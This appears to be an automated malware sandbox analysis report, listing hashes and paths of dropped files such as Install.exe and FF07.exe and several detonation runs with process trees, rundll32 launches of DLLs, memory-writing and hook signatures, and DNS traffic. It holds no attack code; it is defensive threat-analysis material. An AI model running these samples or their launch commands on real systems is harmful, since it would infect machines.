| MD5 | 58cab5bf52fb504b3f59588688c0311d |
| SHA1 | 94e01c814e4c7a80e4c4a74299280e59ee359973 |
| SHA256 | 0bf67a79e2359d3c3cc25d168146f2a1a6c463d842f2d4b263628216ed5f6540 |
| SHA512 | dbce20d0887744762357aec164583fe5943d168ac025f8a1c800b201cb22f1208d435e5f5cd06243e4776cd3cf53596f078e74b95b6c600e22499923512abce8 |
C:\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe
| MD5 | 0546f87c644933402f384d71729b04bf |
| SHA1 | a203ddd527026801c8471d3709054029bf9af57f |
| SHA256 | 8809d9bdb709a13564e73c5a391b14bce9fa3535edd7dc5c32e123d4a7a3ba19 |
| SHA512 | f7bfa275c879f0b19c005c0657c7374cecdf8806275e72cff1cdd5c67e48ea6c5277467baebb766896b3a6e65cb2d88ce032b1f78536cc25362848613dfcbb91 |
\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe
| MD5 | ea64d4a6be3adc60a58a265efa256116 |
| SHA1 | 71d17dc40040eb960c71382b6a1d74a6c9f574d7 |
| SHA256 | cd8a826d8d27be964fff324d502c6cdf567a992118526b8ea078bf0e598a7053 |
| SHA512 | fe2c64e66104adf20aa7934470bdba669f39b9d613e7c0409f19883ba0f7648ca9f5f44ff3a14a7cb60fa457344629a375251e77de3a34d469dc5ebf182dcbbd |
\Users\Admin\AppData\Local\Temp\7zSE7A1.tmp\Install.exe
| MD5 | d7ae760d1d05cb0c45962a594e3bb7f6 |
| SHA1 | 5b766ed71a13204b86a3eab97eda7ce7e2803b72 |
| SHA256 | 24f1244d3cba2b9b71297222f42886c038398054b9e6f4b039c5b68561e45bce |
| SHA512 | f22ac5b5f96b94196c4230470ca55bf73b7f0860708f40aa7ba1964fe40f3088137f1d2b99131eefce392efc47b237726412e521258d73dae96a13d85318737c |
\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe
| MD5 | 7d79c791f56eab15497c93bb978811c7 |
| SHA1 | d96e8764ce800b637b5c081badf5ebf76c23604d |
| SHA256 | 1cd4a14403c41ddfaaf341c46ba7d9026e0e2dacc0701f9f5e845abd38a30402 |
| SHA512 | 8415246bdec9845c0c8baeaff0ffdd30e46a29fa21970e89a11f639b22f36fb0495a1d15e84efb787c7fb60913e168880c828fed3efce8e474a49b8a9211914b |
C:\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe
| MD5 | 40890ae2e936472ca485ad31225693b2 |
| SHA1 | 61363a721cb4d6dd7ae7920e34b04095b7b84dea |
| SHA256 | 741198168dfe745aa6b016fc57d24832a76fc39988d9e36930a20c53357e5248 |
| SHA512 | 6ae93478d0ec97ee211d219c10113aac77449623e3596b7928eea69098e1918b07a3b9d9e84e57a6f992f677a9664ba13e7a734c9125cfb36c1a454a1289fe2b |
\Users\Admin\AppData\Local\Temp\7zS75AD.tmp\Install.exe
| MD5 | 9c28b329e702adbca7d0b7d25f5f0cca |
| SHA1 | 64ae19084eeb8a68f40a1196b23c44f74af50af9 |
| SHA256 | bb588c90fd88dec701bb342cb5d22bbcad9a0ef5f4030e4ee13699506b32ff81 |
| SHA512 | df6c132066d395f560b36ea74a0eb53c66c878c4796c3a3f2f93f5373093c4a9e86b84ed30812b406f24a2dab811a0e20da2a0fbefdf74d73ea45a1340133c14 |
C:\Users\Admin\AppData\Local\Temp\FF07.exe
| MD5 | 3724451ec0294249242ae38e1a0f7b25 |
| SHA1 | b5106f25f9947400c8db8f7029dee557da099fd1 |
| SHA256 | 77cb2044cbc967ba492850d177c98f3deb468a321e2adfd476783c52dbfa4fbf |
| SHA512 | c1f7edb15d5847a4ae2e313178a688237ba79eb971be9e25dbce066a7db96bebbfc57c39f25fed848deb8fd3ca277b274d082f57a34d5f154e76a885021fad84 |
C:\Users\Admin\AppData\Local\Temp\FF07.exe
| MD5 | 4eb40f1a33f203f8dff454c3f3be4b46 |
| SHA1 | 70fa6b39f06c95f3fda8c21ace5510a896d7fe1a |
| SHA256 | 0604f07976533d0969a7ab0d54f521702dbd9176145a813be284d8c7de1e8a20 |
| SHA512 | 47cb541879aa2e438df0ddbcfb9b4e821a8b09d82e97a3ba7d6aa42db7f19a370c6a5e1caa95be63c6620c1052a24ebeca733476a597b1fbd054f9ab89b41308 |
C:\Users\Admin\AppData\Local\Temp\FF07.exe
| MD5 | d8c737fe89b9cd71eda2cb96c53f058a |
| SHA1 | e1f7acc79a8aa902c1c6b913c6dd71383ba3a6b4 |
| SHA256 | f73452f0f414bca5f67f9a4d3e9b37284961bc7cacdbc7a6ee19a53e9a3d91da |
| SHA512 | 900fca6f0d356ef4ba1567c2db0373e649ec7192e2237201d6c6ae7168d5d171335764ad9d3b3e8a8b3b9eb8e3900ce1ec38dd7a1b33a0e3a608e23c64cd54a0 |
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp
| MD5 | 3384df11645214991c43cc79c6162542 |
| SHA1 | 0c0eb94d9f00aa8388134b56f5518549772941d5 |
| SHA256 | c16d54482c78c77562c21f8a2e2463360d923c208cad1c80826bf8267182453a |
| SHA512 | 0faf6bae1e84efde2e197b31678e52dc74dde930852810b3b5db01148faa92efb1841b46a831fd4e73f2d67df27f1dbadb3111f1bf8272a965976a74b8988c68 |
C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new
| MD5 | e05046201fd81921b7688a29b9c61cbc |
| SHA1 | 04bd579b42bd45156569ad63e5a23893a316c0c4 |
| SHA256 | 1324d67ba05fc87d734c72dbee505e7cd8402766d39d0408d36ed97f93b0e37a |
| SHA512 | 6081c0b628a9b7da96856c1ceff2ff8e9994d49e356edcbd871d5fd6659914d55e78e4c0d492a8385a79ad1dfc52e5920556ee177a3d5d606cd0781cfda7771e |
C:\Users\Admin\Documents\GuardFox\RfHaLGAD1f_KWSrCQe5tWOzu.exe
| MD5 | 7e6d304f94b7413e05462a6256ebfd3a |
| SHA1 | 771ad41ac14c3d4ea101e94a088dcb95fc22a1e9 |
| SHA256 | 1da512678c1343da62b47af2859849816d8e6a1943306c5f345091e719510fe6 |
| SHA512 | b6fb6c47412ddda4c33fe429a29d11355abcbc0bbc3b51aacfcb452ac9f7b30eabf72df8a2a1346224d751747c3dc08553416949597d2836094dc6babde0bf93 |
C:\Users\Admin\Documents\GuardFox\_WmA4UeHN2lS8kJMKSI_Okk5.exe
| MD5 | 75fd41e8b9312cdc5e12869b3f8e120a |
| SHA1 | 7ad734927bb5f359d1d710f51508cb24cdec73d9 |
| SHA256 | 25d1dc125433097e2fcacc0892ac2ccf4c0e378eff2cc3f6881992f2641e8d03 |
| SHA512 | 94cff0b426135678f4efc1610aaed8ce659189d28cb6b4d4e9a9fd868ec87227327c1cf53284719dce3d4c4aad97ae0b1b1c734ae9250afaf2d00c8700eaeab8 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:49
Platform
win7-20240221-en
Max time kernel
117s
Max time network
132s
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 228
Analysis: behavioral8
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win10v2004-20240221-en
Max time kernel
149s
Max time network
154s
Signatures
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe
"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Analysis: behavioral9
Detonation Overview
Submitted
2024-02-23 17:45
Reported
2024-02-23 17:48
Platform
win7-20240215-en
Max time kernel
117s
Max time network
121s
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1204 wrote to memory of 1244 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1